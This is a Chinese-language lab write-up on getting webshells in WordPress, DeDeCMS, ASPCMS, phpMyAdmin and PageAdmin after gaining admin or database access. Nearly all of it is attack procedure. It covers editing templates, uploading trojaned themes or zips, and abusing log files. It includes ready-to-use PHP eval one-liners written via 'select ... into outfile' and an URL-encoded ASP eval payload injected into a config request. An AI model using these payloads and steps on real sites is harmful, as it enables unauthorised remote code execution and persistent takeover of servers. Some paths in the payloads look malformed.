常见CMS 靶场复现

一、wordpass

1.修改模版文件getshell

  1. 搭建网站
  1. 登录网站后台
  1. 更改网站模版的相关文件
  1. 写入一句话木马
  1. 凭借路径访问

    /wp-content/themes/twentyfifteen/404.php/?a=phpinfo();

2.上传夹带木马的主题getshell

外观-->主题-->添加-->上传-->浏览-->安装-->访问木马文件

主题打包上传使用,拼接路径访问

复制代码
/wp-content/themes/1/1.php

二、DeDeCMS

1.文件上传管理器上传木马getshell

进入后台--》核心--》文件管理器--》文件上传。上传完后使用上方路径拼接访问即可。

2.更改模版getshell

在模版模块在index.htm里写入一句话木马,更改html文件为php文件后访问。

3.系统sql注入getshell

在系统内的sql命令行执行中,可以先访问它的数据库绝对路径,根据该路径去推测网站绝对路径,写入一句话木马到网站绝对路径下。访问文件连接

复制代码
select @@basedir
select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/'

三、ASPCMS

修改配置文件getshell

登录网站后台登录后-->扩展功能-->幻灯片设置-->保存-->抓包更改请求体内容

复制代码
http://ip/admin_aspcms/index.asp

抓包后更改内容要保证人家原有的%>能够闭合

复制代码
%25><%25eval (request(chr(65)))%25><%25

四、phpmyadmin

1.通过日志文件getshell

更改日志开启模式,确保日志文件开启,并更改日志文件存放位置

在sql语句输入框内输入一句话木马,那么我们的木马就会被带到日志文件中,我们访问日志文件即可连接。

2.写入文件getshell

在该执行框中执行我们的命令,先查看数据库路径地址推测网站绝对路径.

复制代码
select @@basedir
select '<?php @eval($_POST[a]);?>' into outfile 'D:php/www/1.php'

五、Pageadmin

1.上传模版getshell

上传还有木马文件的zip查插件安装包,如果是正版的是可以进行解压的,这里不是正版,各位知道一下即可。

2.上传文件getshel

在工具里面的常用工具,文件管理上传我们压缩后的木马文件,解压就可以得到我们的asp可执行脚本文件。访问连接即可。